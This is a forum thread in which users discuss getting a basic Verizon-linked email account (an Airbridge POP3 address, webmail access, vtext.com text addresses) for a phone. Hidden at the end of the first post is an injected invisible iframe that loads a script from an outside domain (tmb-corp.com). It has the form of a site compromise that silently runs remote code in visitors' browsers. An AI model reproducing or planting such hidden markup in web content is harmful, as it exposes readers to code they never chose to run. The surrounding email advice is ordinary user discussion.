+ Reply to Thread

Basics on Verizon Express for Idiots

If I sign up for Verizon Express Network, do I get an email account that is directly tied to the phone. I'm giving up, for now, on linking my corporate email and just want to do the absolute simplest and least controversial thing -- just have an email account for this phone that requires no special setup and can be accessed extremely quickly (preferrably pushed by Verizon itself).

In other words, can I get a msneider@verizonwireless.com email address or the like automatically linked with the phone with no hassle.

I have decided I will gave that email to select people and bypass the whole corporate email controversy that my IT department is so far not been able to handle.

Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Verizon will set you up with a free Airbridge account if you ask them for it. You're email would then be msneider@airbridge.net, or whatever user name would like.

Originally posted by Rambler
    Verizon will set you up with a free Airbridge account if you ask them for it. You're email would then be msneider@airbridge.net, or whatever user name would like.
    Is that a POP mail account ? I have EN and my other phone uses QCN, will they give it to either of the accounts ? Is it Webmail accessable ?

Originally posted by babacksh
    Is that a POP mail account ? I have EN and my other phone uses QCN, will they give it to either of the accounts ? Is it Webmail accessable ?
    It's a POP3 email account, and you'll need an e-mail app supporting POP3 to access it. Once you have it set up, you should be able to access it through any account.

If your IT department does not have a POP3 server, or allows access only through a VPN, then you will not be able to read your corporate e-mail on your phone.

Keep in mind that the "Messages" application on the main phone menu allows you to send and receive short text messages. Your e-mail address for this application is YOUR_PHONE_NUMBER@vtext.com.

Yes, it is web accessible. You can go to www://mail.airbridge.net
    That will give you the login screen with a verizon logo on it and you just enter your user id and password and you can read your e-mail on the web, attach files an change options. Set up forwarding and stuff like that.

Dagi

Originally posted by Dagi
    That will give you the login screen with a verizon logo on it and you just enter your user id and password and you can read your e-mail on the web, attach files an change options. Set up forwarding and stuff like that.

Dagi
    How stable is their server ?

Originally posted by Dagi
    That's cool, I didn't know that.

Originally posted by babacksh
    How stable is their server ?
    So far I didn't run into any problems yet. I've been using that for about 2 years, more as my backup e-mail website. So I'm surely not a heavy duty user.

Dagi